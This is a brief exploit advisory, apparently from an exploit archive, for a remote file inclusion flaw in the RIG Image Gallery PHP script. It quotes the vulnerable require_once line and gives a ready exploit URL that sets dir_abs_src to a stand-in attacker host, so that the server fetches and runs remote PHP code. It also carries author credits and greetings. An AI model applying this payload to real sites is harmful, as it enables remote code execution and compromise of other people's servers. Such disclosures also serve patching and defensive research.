RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...
Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
-------------------------------------------------------------------------------------------------------------------
Exploit: check_entry.php?dir_abs_src=http://attacker.php?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Ajann,Dumenci,Str0ke